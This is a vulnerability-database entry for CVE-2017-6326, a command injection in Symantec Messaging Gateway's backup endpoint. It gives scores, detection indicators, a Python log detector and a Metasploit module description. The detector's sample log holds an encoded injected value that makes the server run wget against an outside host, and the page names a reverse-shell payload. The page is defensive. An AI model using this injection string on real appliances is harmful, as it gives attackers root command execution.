CVE-2017-6326
Published: 2017-06-26
Priority: P1 (82), critical, CVSS 3.0 base score 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 72.76% (99.4th percentile)
Symantec Messaging Gateway is affected by a remote code execution vulnerability: an attacker who can reach the vulnerable functionality can execute arbitrary commands on the target machine or in the target process.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec | messaging_gateway | <= 10.6.3 | — |
| symantec_corporation | messaging_gateway | — | — |
Detection & IOCs (extracted from sources)
- Monitor for POST requests to /brightmail/admin/backup/performBackupNow.do with a `remoteBackupPath` parameter containing command injection patterns such as `$(` or `${IFS}`.
- Detect use of `${IFS}` as a space-bypass technique in HTTP POST body parameters targeting the SMG backup endpoint.
- Alert on authenticated sessions that access /brightmail/admin/backup/backupNow.do followed immediately by a POST to performBackupNow.do; this is the CSRF-token-harvest-then-exploit sequence used by the module.
- Look for the hidden form field `symantec.brightmail.key.TOKEN` being scraped via GET before a POST to the backup endpoint, indicating automated exploitation.
- Detect outbound SCP/SSH connections initiated by the SMG web server process (running as root) to attacker-controlled hosts; the exploit requires this connection to deliver its payload.
- Flag the default Metasploit payload `python/meterpreter/reverse_tcp` spawned under the web server (root) context on the SMG appliance.
- Exploitation requires valid credentials to the SMG admin interface: this is an authenticated RCE, not an unauthenticated one. Layer brute-force and credential-stuffing detections alongside exploit detection.
- The exploit requires the attacker to operate a reachable SSH/SCP service; blocking outbound SSH from the SMG appliance to untrusted hosts mitigates payload delivery even if the injection succeeds.
- The module was confirmed against SMG version 10.6.2-7 specifically, but the affected range covers every release up to and including 10.6.3, so do not scope detection rules to that single build; apply them to all unpatched versions.
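The detection points above, as an added example that is not part of this page, of Symantec's product or of the Metasploit module: a small Python detector run over constructed sample HTTP log lines (the log format, IP addresses, session IDs, token values and timestamps are invented for the example). It URL-decodes the POST body before matching, because `$(` and `${IFS}` reach the server percent-encoded, and it correlates a GET of backupNow.do with a POST to performBackupNow.do from the same source and session inside a short window, which is what separates scripted token harvesting from an admin clicking the form. The marker list extends the page's `$(` and `${IFS}` with a few other shell metacharacters; that extension and the 10-second window are assumptions to tune against real traffic.

```python
"""Detection for the CVE-2017-6326 exploit sequence against SMG's backup endpoint.

Added example; the log format and every sample value are constructed, not taken from the page.
"""
from datetime import datetime, timedelta
from urllib.parse import parse_qs

BACKUP_FORM = "/brightmail/admin/backup/backupNow.do"           # GET: form carrying the CSRF token
BACKUP_ACTION = "/brightmail/admin/backup/performBackupNow.do"  # POST: carries remoteBackupPath
TOKEN_FIELD = "symantec.brightmail.key.TOKEN"

# "$(" and "${IFS}" are the markers named in the sources; the rest are other shell
# metacharacters worth flagging in a value that is handed to a command (assumption).
INJECTION_MARKERS = ("$(", "${IFS}", "`", ";", "|", "&&")

# Constructed sample log: "<ISO timestamp> <src ip> <session> <METHOD> <path> [<urlencoded body>]"
SAMPLE_LOG = """\
2017-06-26T10:00:01 203.0.113.5 sess-A GET /brightmail/admin/backup/backupNow.do
2017-06-26T10:00:02 203.0.113.5 sess-A POST /brightmail/admin/backup/performBackupNow.do backupType=full&remoteBackupPath=%2Ftmp%24%28wget%24%7BIFS%7Dhttp%3A%2F%2F198.51.100.9%2Fx%29&symantec.brightmail.key.TOKEN=deadbeef
2017-06-26T10:05:00 198.51.100.20 sess-B GET /brightmail/admin/backup/backupNow.do
2017-06-26T10:30:00 198.51.100.20 sess-B POST /brightmail/admin/backup/performBackupNow.do backupType=full&remoteBackupPath=%2Fbackups%2Fnightly&symantec.brightmail.key.TOKEN=cafebabe
2017-06-26T11:00:00 192.0.2.7 sess-C POST /brightmail/admin/backup/performBackupNow.do backupType=full&remoteBackupPath=%2Fbackups&symantec.brightmail.key.TOKEN=feedface
"""


def parse_line(line):
    """Split one log line into a dict; the body is URL-decoded so encoded markers match."""
    parts = line.split(" ", 5)
    ts, src, session, method, path = parts[:5]
    body = parts[5] if len(parts) > 5 else ""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    return {"ts": datetime.fromisoformat(ts), "src": src, "session": session,
            "method": method, "path": path, "params": params}


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def injection_markers(value):
    """Return the markers present in a decoded remoteBackupPath value."""
    return [m for m in INJECTION_MARKERS if m in value]


def find_injection_attempts(events):
    """POSTs to performBackupNow.do whose remoteBackupPath contains shell metacharacters."""
    hits = []
    for e in events:
        if e["method"] == "POST" and e["path"] == BACKUP_ACTION:
            markers = injection_markers(e["params"].get("remoteBackupPath", ""))
            if markers:
                hits.append((e["src"], e["session"], markers))
    return hits


def find_harvest_then_exploit(events, window=timedelta(seconds=10)):
    """GET of the backup form followed within `window` by a token-bearing POST to the
    action from the same source and session. A human admin also does GET then POST,
    so the short window (assumption) is what makes this look scripted."""
    last_form_get = {}
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        key = (e["src"], e["session"])
        if e["method"] == "GET" and e["path"] == BACKUP_FORM:
            last_form_get[key] = e["ts"]
        elif e["method"] == "POST" and e["path"] == BACKUP_ACTION:
            seen = last_form_get.get(key)
            if seen is not None and e["ts"] - seen <= window and TOKEN_FIELD in e["params"]:
                alerts.append(key)
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for src, sess, markers in find_injection_attempts(evs):
        print(f"injection attempt: {src} {sess} markers={markers}")
    for src, sess in find_harvest_then_exploit(evs):
        print(f"harvest-then-exploit sequence: {src} {sess}")
```

Run it as a script to see both alerts fire for the first session only; the second session is an admin running a normal backup 25 minutes after opening the form, and the third never fetched the form at all. In production the two rules are worth keeping separate: the marker rule catches hand-crafted requests that skip the form, while the sequence rule catches automated tooling even if a new bypass avoids the markers you list.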
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 10.0 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
Note that both NVD vectors score the flaw as requiring no privileges (PR:N, Au:N), whereas the public Metasploit module needs valid SMG admin credentials; treat the scored severity as an upper bound and the authenticated path as the one that is actually weaponized.
No detection rules found.
Exploit-DB
Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)
exploitdb · 2017-06-26
---
The module header as indexed from Exploit-DB; the class and initializer lines are restored from the standard Metasploit module layout because the page shows only the comment header and the description, and the rest of the module is not reproduced here.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Class and initializer boilerplate restored from the standard Metasploit layout;
# only the header comment and the description text appear on the page.
class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Symantec Messaging Gateway Remote Code Execution',
      'Description' => %q{
        This module exploits a command injection vulnerability in the Symantec Messaging
        Gateway product. An authenticated user can execute a terminal command in the
        context of the web server user, which is root. The backupNow.do endpoint takes
        several user inputs and passes them to the internal service responsible for
        executing operating system commands. One of the inputs is passed to that service
        without proper validation, which causes a command injection vulnerability. The
        other parameters, such as the SSH IP address, port and credentials, are validated
        before the command is executed, so you need to run your own SSH service and set
        the corresponding options when using the module.
      },
      # Remaining metadata, options, check and exploit methods are not reproduced on this page.
    ))
  end
end
```
Metasploit
Symantec Messaging Gateway Remote Code Execution
This module exploits a command injection vulnerability in the Symantec Messaging Gateway product. An authenticated user can execute a terminal command in the context of the web server user, which is root. The backupNow.do endpoint takes several user inputs and passes them to the internal service responsible for executing operating system commands. One of the inputs is passed to that service without proper validation, which causes a command injection vulnerability. The other parameters, such as the SSH IP address, port and credentials, are validated before the command is executed, so you need to configure your own SSH service and set the required options when using the module. This module was tested against Symantec Messaging G
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/98893
- http://www.securitytracker.com/id/1038785
- https://www.exploit-db.com/exploits/42251/
- https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170621_00